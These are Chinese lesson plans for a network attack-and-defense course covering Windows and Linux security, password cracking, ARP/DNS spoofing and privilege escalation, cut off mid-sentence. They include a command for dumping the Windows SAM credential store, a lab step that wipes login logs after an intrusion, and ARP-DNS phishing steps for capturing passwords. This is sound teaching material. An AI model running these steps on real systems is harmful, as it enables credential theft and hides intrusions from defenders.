《網(wǎng)絡(luò)攻防技術(shù)》教案全套 -第1-7章 網(wǎng)絡(luò)攻擊技術(shù)概述- 移動(dòng)互聯(lián)網(wǎng)應(yīng)用的攻防

網(wǎng)絡(luò)攻防技術(shù)課程教案學(xué)年第學(xué)期

教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式講授授課日期授課章節(jié)名稱第1章網(wǎng)絡(luò)攻防技術(shù)概述教學(xué)目的與要求1.讓學(xué)生了解網(wǎng)絡(luò)攻防的意義；2.讓學(xué)生了解網(wǎng)絡(luò)攻防基本概念以及常用方法教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：了解黑客、駭客以及紅客的概念；了解網(wǎng)絡(luò)攻擊的類型、屬性以及方法。端口掃描、口令攻擊、彩虹表等攻擊方法。難點(diǎn)：彩虹表的工作原理。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)課后習(xí)題課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)第1章網(wǎng)絡(luò)攻擊技術(shù)概述1.1黑客、紅客以及紅黑對(duì)抗黑客與紅客紅黑對(duì)抗1.2網(wǎng)絡(luò)攻擊的類型主動(dòng)攻擊主動(dòng)攻擊是指攻擊者為了實(shí)現(xiàn)攻擊目的，主動(dòng)對(duì)需要訪問(wèn)的信息進(jìn)行非授權(quán)的訪問(wèn)行為。主要針對(duì)信息的可用性，完整性和真實(shí)性進(jìn)行攻擊。被動(dòng)攻擊利用網(wǎng)絡(luò)存在的漏洞和安全缺陷對(duì)網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)進(jìn)行的攻擊。一般不對(duì)數(shù)據(jù)進(jìn)行篡改，通過(guò)截取或者竊聽(tīng)等方式，未經(jīng)用戶授權(quán)。1.3網(wǎng)絡(luò)攻擊的屬性權(quán)限轉(zhuǎn)換方法動(dòng)作1.4主要攻擊方法1.5網(wǎng)絡(luò)攻擊的實(shí)施過(guò)程1.6網(wǎng)絡(luò)功放的發(fā)展趨勢(shì)教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式上機(jī)授課日期年10月9日第6周授課時(shí)數(shù)3授課章節(jié)名稱攻防平臺(tái)配置、Linux基本命令教學(xué)目的與要求1.熟悉Kali在虛擬機(jī)中的安裝。2.掌握Linux基本操作命令。教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：學(xué)習(xí)Kali在虛擬機(jī)中的安裝，熟悉Linux常用的cp、mv、mkdir等操作命令，通過(guò)實(shí)際操作加深印象。難點(diǎn)：了解Linux的文件系統(tǒng)。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)常用命令的綜合練習(xí)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)1.虛擬機(jī)下Kali的安裝1.1安裝Kali系統(tǒng)1.2設(shè)置軟件源1.3安裝open-vm-tool2.Linux文件系統(tǒng)2.1根目錄和用戶目錄2.2絕對(duì)路徑和相對(duì)路徑2.3ls、cd和pwd2.4cp和mv2.5touch、mkdir和rm2.6其他常用指令2.7通配符

教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式講授授課日期年10月14日第7周授課時(shí)數(shù)3授課章節(jié)名稱第2章Windows操作系統(tǒng)的攻防教學(xué)目的與要求1.了解Windows操作系統(tǒng)的安全機(jī)制。2.了解Windows系統(tǒng)下針對(duì)數(shù)據(jù)、賬戶以及進(jìn)程與服務(wù)的攻防。教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：掌握EFS工作原理，掌握SID的概念以及特點(diǎn)，了解Windows系統(tǒng)的SAM文件，了解進(jìn)程與服務(wù)概念以及常用端口。難點(diǎn)：理解Kerberos工作機(jī)制。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)第2章Windows操作系統(tǒng)的攻防2.1操作系統(tǒng)的安全機(jī)制Windows操作系統(tǒng)的層次結(jié)構(gòu)Windows服務(wù)器的安全模型用戶賬戶管理用戶模式和內(nèi)核模式2.2針對(duì)Windows數(shù)據(jù)的攻防數(shù)據(jù)本身的安全EFS加密BitLocker加密數(shù)據(jù)存儲(chǔ)安全獨(dú)立冗余磁盤陣列（RAID）技術(shù)雙機(jī)熱備數(shù)據(jù)遷移異地容災(zāi)2.3針對(duì)賬戶的攻防賬戶和組用戶的登錄和認(rèn)證NTLM登錄驗(yàn)證Kerberos登錄驗(yàn)證賬戶的密碼和安全SAM文件的獲取:SAM文件開(kāi)始被系統(tǒng)調(diào)用而無(wú)法直接復(fù)制，但可通過(guò)以下兩種方式獲?。簭?fù)制SAM備份文件使用regsavehklm\samsam.hive命令將SAM文件備份出來(lái)SAM文件的破解 利用LC5、10phtcrack、WMIcrack、SMBcrack等工具軟件破解SAM文件內(nèi)容權(quán)限管理2.4針對(duì)進(jìn)程與服務(wù)的攻防進(jìn)程、線程、程序和服務(wù)的概念重要系統(tǒng)進(jìn)程常見(jiàn)的服務(wù)與端口

教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式上機(jī)授課日期年10月16日第7周授課時(shí)數(shù)3授課章節(jié)名稱Windows加密，口令破解實(shí)驗(yàn)教學(xué)目的與要求掌握EFS加密以及Windows系統(tǒng)的口令破解教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：使用EFS對(duì)文件進(jìn)行加密，學(xué)會(huì)備份SAM文件并對(duì)其進(jìn)行破解，掌握FTP和遠(yuǎn)程桌面連接的使用。難點(diǎn)：安裝和配置FTP服務(wù)器并進(jìn)行上傳更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)1、讓學(xué)生思考下實(shí)驗(yàn)還有哪些未完成的事情。2、嘗試破解系統(tǒng)的administrator，記錄遇到的問(wèn)題，并寫下解決方法。課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)Windows加密，口令破解實(shí)驗(yàn)口令破解實(shí)驗(yàn)情景設(shè)置主題情境背景：某公司員工A電腦有份重要價(jià)值的文件，員工B想要拿過(guò)來(lái)去賣給別的公司。主題情境目標(biāo)：?jiǎn)T工B通過(guò)使用工具滲透到員工A的電腦上，竊取那份文件。主題情境條件設(shè)置：文件為員工A的私有文件員工B知道員工A使用的是微軟已經(jīng)停止更新服務(wù)的XP系統(tǒng)員工A下班回家，為便于回家后還可以繼續(xù)訪問(wèn)公司電腦。他讓管理員把他的電腦開(kāi)通了遠(yuǎn)程桌面實(shí)驗(yàn)分析與設(shè)計(jì)實(shí)驗(yàn)環(huán)境配置用戶口令破解漏洞利用，獲取shell權(quán)限創(chuàng)建管理員賬戶SAM文件獲取離線破解用戶口令竊取文件使用員工A賬戶遠(yuǎn)程登陸訪問(wèn)待竊取的文件2.Windows加密當(dāng)前用戶A采用EFS加密文件或文件夾切換其他用戶B登錄，訪問(wèn)EFS加密的文件,可發(fā)現(xiàn)不可以讀取已加密的文件切換回用戶A登錄，可直接訪問(wèn)A之前采用EFS加密的文件

教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式講授授課日期年10月21日第8周授課時(shí)數(shù)3授課章節(jié)名稱第2章Windows操作系統(tǒng)的攻防教學(xué)目的與要求了解Windows系統(tǒng)下針對(duì)日志、系統(tǒng)漏洞以及注冊(cè)表和組策略的攻防教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：了解Windows系統(tǒng)日志的基本功能以及管理維護(hù)，了解漏洞產(chǎn)生的原因以及攻擊與防范對(duì)策，掌握Windows系統(tǒng)中注冊(cè)表以及組策略的使用。難點(diǎn)：學(xué)會(huì)利用漏洞發(fā)起攻擊。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)第2章Windows操作系統(tǒng)的攻防2.5針對(duì)日志的攻防Windows日志概述日志分析防火墻日志分析通過(guò)對(duì)防火墻日志的分析，可以找出針對(duì)本地主機(jī)的潛在威脅，并對(duì)攻擊者的IP進(jìn)行溯源。IIS日志分析日志管理網(wǎng)絡(luò)入侵基本步驟系統(tǒng)日志安全保護(hù)目標(biāo)假設(shè)一旦攻擊行為已經(jīng)成功完成了前兩步的操作的前提下，仍然能夠保護(hù)系統(tǒng)日志的安全系統(tǒng)日志安全保護(hù)方式加強(qiáng)對(duì)日志文件訪問(wèn)賬號(hào)的安全管理對(duì)日志文件進(jìn)行安全備份2.6針對(duì)系統(tǒng)漏洞的攻防Windows系統(tǒng)漏洞利用漏洞攻擊方式0Day漏洞通用漏洞披露庫(kù)（CVE）典型的利用漏洞的攻擊過(guò)程漏洞掃描攻擊工具準(zhǔn)備發(fā)起攻擊補(bǔ)丁管理安裝軟件補(bǔ)丁是安全和迅速解決小范圍軟件錯(cuò)誤的有效途徑2.7針對(duì)注冊(cè)表和組策略的攻防針對(duì)注冊(cè)表的攻防注冊(cè)表的概念注冊(cè)表簡(jiǎn)介針對(duì)組策略的攻防組策略（GroupPolicy）是Windows系統(tǒng)中一個(gè)能夠讓系統(tǒng)管理員充分管理用戶工作環(huán)境的工具，通過(guò)它可以為用戶設(shè)置不同的工作環(huán)境。組策略配置組策略、注冊(cè)表、控制面板對(duì)比本地安全策略教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式上機(jī)授課日期年10月23日第8周授課時(shí)數(shù)3授課章節(jié)名稱ARP和DNS欺騙攻擊教學(xué)目的與要求1.掌握ARP欺騙的原理2.掌握DNS欺騙的原理教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：掌握ARP欺騙和DNS欺騙的原理難點(diǎn)：使用工具實(shí)踐ARP和DNS欺騙更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)ARP和DNS欺騙攻擊ARP原理ARP協(xié)議：ARP（AddressResolutionProtocol，地址解析協(xié)議）是一個(gè)位于TCP/IP協(xié)議棧中的網(wǎng)絡(luò)層，負(fù)責(zé)將某個(gè)IP地址解析成對(duì)應(yīng)的MAC地址。ARP協(xié)議的基本功能：通過(guò)目標(biāo)設(shè)備的IP地址，查詢目標(biāo)設(shè)備的MAC地址，以保證通信的進(jìn)行。ARP攻擊的局限性：ARP攻擊僅能在局域網(wǎng)進(jìn)行，無(wú)法對(duì)外網(wǎng)進(jìn)行攻擊。ARP攻擊的攻擊原理：ARP攻擊就是通過(guò)偽造IP地址和MAC地址實(shí)現(xiàn)ARP欺騙，能夠在網(wǎng)絡(luò)中產(chǎn)生大量的ARP通信量使網(wǎng)絡(luò)阻塞，攻擊者只要持續(xù)不斷的發(fā)出偽造的ARP響應(yīng)包就能更改目標(biāo)主機(jī)ARP緩存中的IP-MAC條目，造成網(wǎng)絡(luò)中斷或中間人攻擊。常見(jiàn)的ARP欺騙手法：同時(shí)對(duì)局域網(wǎng)內(nèi)的一臺(tái)主機(jī)和網(wǎng)關(guān)進(jìn)行ARP欺騙，更改這臺(tái)主機(jī)和網(wǎng)關(guān)的ARP緩存表。如下圖（PC2是攻擊主機(jī)，PC1是被攻擊主機(jī)）所示：主題情景設(shè)置主題情景背景：A為犯罪嫌疑人，警察B想獲得A在其單位網(wǎng)站的用戶名與密碼，以從A單位郵箱中查找犯罪證據(jù)文件主題情景目標(biāo)：警察B通過(guò)ARP—DNS欺騙，將A訪問(wèn)單位網(wǎng)站跳轉(zhuǎn)到與其單位網(wǎng)站幾乎一樣的釣魚(yú)網(wǎng)站，進(jìn)而獲得嫌疑人A的用戶名與密碼主題情境條件設(shè)置：警察與嫌疑人的電腦在同一局域網(wǎng)內(nèi)已有A單位的釣魚(yú)網(wǎng)站實(shí)驗(yàn)過(guò)程攻擊機(jī)運(yùn)行Cain工具，配置“Sniffer”標(biāo)簽項(xiàng)選取嗅探的協(xié)議類型和端口號(hào)選擇ScanMACAddresses進(jìn)行掃描進(jìn)行嗅探選擇網(wǎng)關(guān)和被欺騙地址配置ARP-DNS選項(xiàng).(將其單位網(wǎng)站的訪問(wèn)欺騙到IP地址為0的主機(jī)上)。進(jìn)行ARP欺騙嫌疑人A訪問(wèn)其當(dāng)我網(wǎng)站將跳轉(zhuǎn)到主機(jī)0上布置的釣魚(yú)網(wǎng)站。在嫌疑人登錄其單位網(wǎng)站，即可以獲得A的用戶名與密碼。

教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式理論授課日期年10月28日第9周授課時(shí)數(shù)3授課章節(jié)名稱Linux操作系統(tǒng)的工作與安全機(jī)制教學(xué)目的與要求了解Linux系統(tǒng)的工作與安全機(jī)制教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：掌握Linux系統(tǒng)用戶和組的概念，掌握Linux系統(tǒng)身份的幾種認(rèn)證方式以及特點(diǎn)，掌握Linux系統(tǒng)權(quán)限分配與訪問(wèn)控制機(jī)制，了解Linux系統(tǒng)日志的基本概念和管理維護(hù)。難點(diǎn)：Linux系統(tǒng)用戶權(quán)限中SUID和SGID的概念更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)簡(jiǎn)述Linux系統(tǒng)的安全機(jī)制及主要實(shí)現(xiàn)方法。Linux環(huán)境中的用戶賬戶分為哪幾類？如何獲取其信息？如何進(jìn)行安全防范？課后體會(huì)

授課主要內(nèi)容或板書(shū)設(shè)計(jì)1Linux操作系統(tǒng)的工作機(jī)制1.1Linux操作系統(tǒng)概述Linux基本思想是：一切都是文件。即系統(tǒng)中包括命令、硬件和軟件設(shè)備、進(jìn)程等所有對(duì)象對(duì)于操作系統(tǒng)內(nèi)核而言都被視為擁有各自特性或類型的文件。1.2Linux操作系統(tǒng)的結(jié)構(gòu)從體系結(jié)構(gòu)來(lái)看，Linux操作系統(tǒng)的體系架構(gòu)分為用戶態(tài)和內(nèi)核態(tài)，也稱為用戶空間和內(nèi)核。硬件抽象層中的各類設(shè)備驅(qū)動(dòng)程序可以完全訪問(wèn)硬件設(shè)備，方便地以模塊化形式設(shè)置，并在系統(tǒng)運(yùn)行期間裝載和卸載。硬件抽象層以上是內(nèi)核服務(wù)功能模塊，包括：進(jìn)程管理、內(nèi)存管理、文件系統(tǒng)管理、設(shè)備控制與網(wǎng)絡(luò)5個(gè)子系統(tǒng)。所有的內(nèi)核模塊通過(guò)系統(tǒng)調(diào)用接口向用戶態(tài)的GNU運(yùn)行庫(kù)及工具、命令行shell及應(yīng)用軟件服務(wù)。1.3Linux操作系統(tǒng)的工作機(jī)制Linux操作系統(tǒng)在進(jìn)程與線程管理、內(nèi)存管理、文件系統(tǒng)管理、設(shè)備控制、網(wǎng)絡(luò)、系統(tǒng)調(diào)用等方面都形成了特有的工作機(jī)制。進(jìn)程管理內(nèi)存管理、文件管理及設(shè)備管理網(wǎng)絡(luò)管理Linux操作系統(tǒng)的安全機(jī)制2.1用戶和組1、用戶：Linux的用戶信息保存在系統(tǒng)的/etc/passwd文件中，主要包括用戶名、用戶唯一的標(biāo)識(shí)（uid）、使用Shell類型、用戶初始目錄等，而被加密后的口令則存放在/etc/shadow文件中，只有Root用戶可以讀取其信息。Root普通用戶系統(tǒng)用戶2、組Linux組信息保存在系統(tǒng)的/etc/group文件中，包括組名稱、組標(biāo)識(shí)（gid）以及組所包含的用戶名列表，組的被加密后的口令保存在/etc/gshadow文件中。2.2身份認(rèn)證1、本地身份認(rèn)證口令認(rèn)證：登錄進(jìn)程通過(guò)Crypt()函數(shù)對(duì)用戶輸入的口令進(jìn)行驗(yàn)證，并通過(guò)引入在用戶設(shè)置密碼時(shí)隨機(jī)產(chǎn)生的salt值來(lái)提高身份認(rèn)證的安全性。2、遠(yuǎn)程身份認(rèn)證普遍采用SSH（SecureShell）服務(wù)來(lái)實(shí)現(xiàn)對(duì)遠(yuǎn)程訪問(wèn)的安全保護(hù)。Ssh也相應(yīng)的提供兩種認(rèn)證方式：基于口令和基于非對(duì)稱密鑰（服務(wù)器收到登錄指令，用公鑰加密質(zhì)疑，用戶用私鑰解密再發(fā)給服務(wù)器）3、可插入身份認(rèn)證模塊系統(tǒng)管理員通過(guò)PAM配置文件（etc/pam.conf）來(lái)定制身份認(rèn)證策略Linux的PAM配置可以在/etc/pam.conf文件或/etc/pam.d/目錄下進(jìn)行，系統(tǒng)管理員可以根據(jù)需要進(jìn)行靈活配置。不過(guò)，這兩種配置方式不能同時(shí)起作用，即只能使用其中一種方式對(duì)PAM進(jìn)行配置，一般為/etc/pam.d/優(yōu)先。2.3訪問(wèn)控制Linux的權(quán)限分配與訪問(wèn)控制機(jī)制【核心基于一切都是文件】（3）所屬組和其他用戶在Linux系統(tǒng)中，UID是代表?yè)碛姓叩奈ㄒ粯?biāo)識(shí)。根據(jù)管理需要，一個(gè)UID可以指派到一個(gè)或多個(gè)GID中進(jìn)行管理。（4）SUID和SGID例：Linux系統(tǒng)文件訪問(wèn)權(quán)限的執(zhí)行位上，有一類特殊的執(zhí)行權(quán)限，或被稱為“特權(quán)”，常見(jiàn)的SUID和SGID。s標(biāo)志出現(xiàn)在文件所有者的x權(quán)限上時(shí)，則此程序被設(shè)置了SUID特殊權(quán)限?！綞g】在系統(tǒng)中有兩個(gè)passwd文件，一個(gè)在/etc文件夾下，存放用戶的口令等信息，是—個(gè)文本文件，任何用戶都可以讀，另一個(gè)在，usr／bin目錄下，是一個(gè)可執(zhí)行命令。ls-l/usr/bin/passwd-rwsr-xr-x.1rootroot25980Feb172012/usr/bin/passwd//可以看到該文件所屬主權(quán)限標(biāo)志位上是rws,文件屬主是root,其他人具有執(zhí)行權(quán)限(x),就是說(shuō)當(dāng)其他人執(zhí)行該命令是會(huì)暫時(shí)獲得文件屬主權(quán)限,即root權(quán)限,而root是可以操作/etc/shadow文件的。passwd是一個(gè)命令,即一個(gè)可執(zhí)行二進(jìn)制文件,可以使用這個(gè)命令來(lái)修改用戶密碼。由于用戶密碼是存儲(chǔ)在/etc/shadow文件中,但是該文件權(quán)限是640,就是不允許任何人修改(root除外),使用該命令能修改用戶密碼,是因?yàn)閳?zhí)行該命令的時(shí)候我們擁有了一個(gè)特殊權(quán)限,這個(gè)特殊權(quán)限讓我們可執(zhí)行passwd命令修改密碼那一刻才能修改shadow文件。2.4Linux的日志Linux系統(tǒng)的日志服務(wù)由日志守護(hù)進(jìn)程syslog管理，syslog位于/etc/syslog、/etc/syslogd或/etc/rsyslog.d中，默認(rèn)配置文件為/etc/syslog.conf或rsyslog.conf，當(dāng)某一程序要生成日志時(shí)都需要通過(guò)配置向syslog發(fā)送信息。默認(rèn)配置下，日志文件通常都保存在/var/log目錄下。系統(tǒng)接入日志：/var/log/wtmp和/var/log/utmp。/var/log/messages是系統(tǒng)管理員在進(jìn)行故障診斷時(shí)首先要查看的文件。（核心系統(tǒng)日志文件：包含系統(tǒng)啟動(dòng)、I/O錯(cuò)誤、網(wǎng)絡(luò)錯(cuò)誤和其他系統(tǒng)錯(cuò)誤）。wtmp文件記錄每個(gè)用戶登錄、注銷及系統(tǒng)的啟動(dòng)、停機(jī)的事件（跟last命令差不多：last–u；last-t）。一般黑客會(huì)刪除的日志文件有：lastlog、utmp(utmpx)、wtmp(wtmpx)、messages、syslog。

教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式上機(jī)授課日期年10月30日第周授課時(shí)數(shù)3授課章節(jié)名稱Linux用戶和組的管理、文件權(quán)限管理、用戶密碼破解教學(xué)目的與要求1.掌握Linux系統(tǒng)中用戶和組的管理命令2.掌握Linux系統(tǒng)中文件權(quán)限設(shè)置的命令3.掌握口令破解工具彩虹表的使用教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：掌握Linux系統(tǒng)中用戶與組管理的常用命令，掌握彩虹表工具的使用。難點(diǎn)：理解Linux系統(tǒng)文件訪問(wèn)權(quán)限概念并會(huì)進(jìn)行實(shí)際操作更改訪問(wèn)權(quán)限。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)常用的用戶和組管理命令綜合練習(xí)課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)1.Linux系統(tǒng)的用戶和組1.1用戶與UID1.2用戶組2.用戶管理2.1用戶管理命令2.2密碼管理2.3與用戶管理相關(guān)的文件2.4與用戶管理相關(guān)的其他命令3.組管理命令3.1組管理的基本命令3.2與組管理相關(guān)的其他命令4彩虹表4.1生成彩虹表4.2利用彩虹表破解口令

教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式理論授課日期年11月4日第10周授課時(shí)數(shù)3授課章節(jié)名稱Linux系統(tǒng)本地與遠(yuǎn)程的攻防教學(xué)目的與要求1.Linux主機(jī)賬戶信息的獲取2.Linux主機(jī)的遠(yuǎn)程滲透攻擊3.DNS服務(wù)器的攻防4.Apache服務(wù)器的攻防5.Linux用戶提權(quán)方法教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：掌握Linux系統(tǒng)中用戶用戶提權(quán)方法。難點(diǎn)：安全漏洞及利用得方法。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)通過(guò)實(shí)際操作，掌握利用.htaccess對(duì)Apache服務(wù)器進(jìn)行安全保護(hù)的方法。介紹Linux系統(tǒng)中對(duì)普通用戶賬戶進(jìn)行提權(quán)的方法。課后體會(huì)授課主要內(nèi)容或板書(shū)設(shè)計(jì)1Linux主機(jī)賬戶信息的獲取1.1遠(yuǎn)程登陸賬戶信息的獲取一種最高效的辦法是在直接獲取保存遠(yuǎn)程登錄賬戶信息的文件（一種最高效的辦法是在直接獲取保存遠(yuǎn)程登錄賬戶信息的文件（/etc/passwd和etc/shadow）后，再?gòu)奈募腥〉糜脩裘痛翱?。直觀方法缺點(diǎn)：出現(xiàn)于安全考慮，Linux系統(tǒng)對(duì)保存用戶賬戶信息的文件從存儲(chǔ)和訪問(wèn)控制等方面都設(shè)置了嚴(yán)格的管理權(quán)限，只有Root用戶才能讀取，而要獲取Root用戶的權(quán)限則需要獲得其密碼。多通過(guò)口令猜測(cè)或暴力破解等攻擊手段來(lái)獲取遠(yuǎn)程登錄賬戶的信息。常用方式一般過(guò)程：先利用Linux系統(tǒng)上的rusers、sendmail、finger等服務(wù)來(lái)獲取被攻擊Linux主機(jī)上的用戶名，然后再通過(guò)猜測(cè)（針對(duì)弱口令）、字典攻擊、暴力破解等方式來(lái)獲得對(duì)應(yīng)的密碼。其中，由于Root賬戶的重要性，利用該方法獲得其登錄密碼幾乎成為所有攻擊者的關(guān)注目標(biāo)。1.2遠(yuǎn)程登陸賬戶的防范方法2Linux主機(jī)的遠(yuǎn)程滲透攻擊2.1Linux安全漏洞及利用例：RHELLinux系統(tǒng)內(nèi)核網(wǎng)絡(luò)協(xié)議棧實(shí)現(xiàn)（net/ipv4/udp.c）中存在一個(gè)遠(yuǎn)程拒絕服務(wù)安全漏洞（CVE-2010-4161），攻擊者通過(guò)向目標(biāo)主機(jī)上任意開(kāi)放的UDP端口發(fā)送一個(gè)特殊構(gòu)造的UDP數(shù)據(jù)包，就可以發(fā)起對(duì)目標(biāo)主機(jī)的DoS攻擊。2.2針對(duì)遠(yuǎn)程滲透攻擊的防范方法3DNS服務(wù)器的攻防DNS（DomainNameSystem，域名系統(tǒng)）是互聯(lián)網(wǎng)絕大多數(shù)應(yīng)用的實(shí)際尋址方式，域名是互聯(lián)網(wǎng)上的身份標(biāo)識(shí)，是不可重復(fù)的唯一標(biāo)識(shí)資源。DNS因其在互聯(lián)網(wǎng)應(yīng)用中的重要性，已成為網(wǎng)絡(luò)攻擊的主要對(duì)象。例：一個(gè)典型的DNS攻擊過(guò)程分析。受暴風(fēng)影音軟件存在的設(shè)計(jì)缺陷以及免費(fèi)智能DNS軟件DNSPod的不健壯性影響，黑客通過(guò)僵尸網(wǎng)絡(luò)控制下的DDoS攻擊，致使我國(guó)江蘇、安徽、廣西、海南、甘肅、浙江等省在內(nèi)的23個(gè)省出現(xiàn)罕見(jiàn)的斷網(wǎng)故障，即“5?19斷網(wǎng)事件”。3.1DNS安全防范方法3.2針對(duì)基于BIND軟件的DNS的安全管理方法4Apache服務(wù)器的攻防4.1針對(duì)Apache服務(wù)器常見(jiàn)攻擊方式4.2安全防范方法1、隱藏Apache版本2、創(chuàng)建安全目錄結(jié)構(gòu)3、為Apache分配專門的執(zhí)行賬戶4、Web目錄的訪問(wèn)控制5Linux用戶提權(quán)方法通過(guò)遠(yuǎn)程滲透技術(shù)，攻擊者可以獲得系統(tǒng)的遠(yuǎn)程訪問(wèn)權(quán)限，并能夠?qū)崿F(xiàn)遠(yuǎn)程登錄。在完成了遠(yuǎn)程登錄后，攻擊者就轉(zhuǎn)向?qū)Ρ镜刂鳈C(jī)的攻擊。本地主機(jī)攻擊過(guò)程中最重要的是用戶權(quán)限的提升。5.1通過(guò)獲取/etc/shadow文件的信息來(lái)提權(quán)5.2利用軟件漏洞來(lái)提權(quán)在無(wú)法通過(guò)獲取/etc/shadow文件的情況下，可以利用Linux系統(tǒng)軟件中存在的漏洞來(lái)完成提權(quán)操作。1、利用sudo程序的漏洞進(jìn)行提權(quán)2、利用SUID程序漏洞進(jìn)行提權(quán)3、利用Linux內(nèi)核代碼漏洞進(jìn)行提權(quán)5.3針對(duì)本地提權(quán)攻擊的安全防范方法結(jié)合本節(jié)介紹的幾類提權(quán)攻擊方法，下面主要基于Linux服務(wù)器的應(yīng)用，從系統(tǒng)管理的角度提些建議：1、針對(duì)SUID特權(quán)程序；2、針利利用代碼漏洞進(jìn)行本地提權(quán)問(wèn)題；3、針對(duì)Linux在訪問(wèn)控制機(jī)制中存在的本地提權(quán)漏洞。教案（課時(shí)授課計(jì)劃）教師姓名授課班級(jí)授課形式上機(jī)授課日期年11月6日第10周授課時(shí)數(shù)3授課章節(jié)名稱實(shí)驗(yàn)：Linux系統(tǒng)日志清除、及鍵盤記錄教學(xué)目的與要求1.了解Linux日志的作用、存放位置、工作特點(diǎn)以及刪除方法。2.Metasploit框架有個(gè)初步的認(rèn)識(shí)教學(xué)重點(diǎn)或教學(xué)難點(diǎn)重點(diǎn)：掌握Linux系統(tǒng)日志的組成、存放位置以及安全管理方法。更新、補(bǔ)充、刪節(jié)內(nèi)容無(wú)使用教具或手段多媒體課外作業(yè)課后體會(huì)綜合運(yùn)用Linux系統(tǒng)提供的大量命令，通過(guò)系統(tǒng)的、關(guān)聯(lián)的分析還是能夠找到攻擊者的蛛絲馬跡。授課主要內(nèi)容或板書(shū)設(shè)計(jì)1情境背景目標(biāo)：入侵Linux系統(tǒng)后，查閱當(dāng)前系統(tǒng)的日志信息，分析之前用戶運(yùn)維操作的命令，并將入侵日志刪除。方法：將前序課程學(xué)習(xí)到的Linux命令，結(jié)合本課程日志文件存放位置及格式，進(jìn)行相關(guān)操作。從攻擊者的角度來(lái)看，日志文件中記錄的事件信息對(duì)攻擊者掌握系統(tǒng)的運(yùn)行內(nèi)容和運(yùn)行狀況是很有幫助的；而從防范的角度看，日志中可以記錄幾乎所有的攻擊行為，這些事件信息對(duì)于確定攻擊源及攻擊意圖，進(jìn)而確定相應(yīng)的防范方法都是很有價(jià)值的。在Linux系統(tǒng)中，有3個(gè)主要的日志子系統(tǒng)：系統(tǒng)接入日志。多個(gè)程序會(huì)記錄該日志，分別記錄到/var/log/wtmp和/var/log/utmp中，telnet和ssh等程序都會(huì)更新wtmp與utmp文件，系統(tǒng)管理員可以根據(jù)該日志跟蹤到誰(shuí)在什么時(shí)間登錄過(guò)系統(tǒng)。進(jìn)程統(tǒng)計(jì)日志。進(jìn)程統(tǒng)計(jì)日志由Linux內(nèi)核記錄，當(dāng)一個(gè)進(jìn)程終止時(shí)，進(jìn)程終止文件（pacct或acct）中會(huì)進(jìn)行記錄這一事件。進(jìn)程統(tǒng)計(jì)日志可以供系統(tǒng)管理員分析系統(tǒng)使用者對(duì)系統(tǒng)進(jìn)行的配置，以及對(duì)文件進(jìn)行的操作。錯(cuò)誤日志。Syslog日志系統(tǒng)已經(jīng)被許多設(shè)備兼容，Linux的syslog可以記錄系統(tǒng)事件，主要由syslogd程序執(zhí)行，Linux系統(tǒng)下各種進(jìn)程、用戶程序和內(nèi)核都可以通過(guò)Syslog文件記錄重要信息，錯(cuò)誤日志記錄在/var/log/messages中。2實(shí)驗(yàn)一目的2.1Linux日志的作用。2.2Linux日志的存放位置及工作特點(diǎn)。2.3Linux日志的刪除方法。3實(shí)驗(yàn)一過(guò)程3.1查看Linux系統(tǒng)日志。Step1：以root身份登錄系統(tǒng)后，執(zhí)行“cat/var/log/messages”等命令查看以各個(gè)日志內(nèi)容：/messages、/secure。Step2：以root身份登錄后，執(zhí)行“who/var/log/wtmp”（如圖3-28所示）、“l(fā)ast”命令，查看wtmp文件的內(nèi)容。3.2手動(dòng)刪除Linux日志使用root身份登錄系統(tǒng)，執(zhí)行命令：rm–f/var/log/wtmp（如圖3-31所示），再用ls/var/log命令查看/var/log目錄下的日志文件，發(fā)現(xiàn)wtmp被刪除。使用相同的方法，可以對(duì)其他日志文件進(jìn)行修改、刪除操作。4實(shí)驗(yàn)二目的本小節(jié)要求對(duì)Metasploit框架有個(gè)初步的認(rèn)識(shí)。4.1主要介紹了Metasploit框架中Meterpreter模塊的部分應(yīng)用。4.2在Metasploit幫助文檔和技術(shù)資料的幫助下，通過(guò)具體實(shí)驗(yàn)，掌握Metasploit的主要應(yīng)用功能。5實(shí)驗(yàn)二過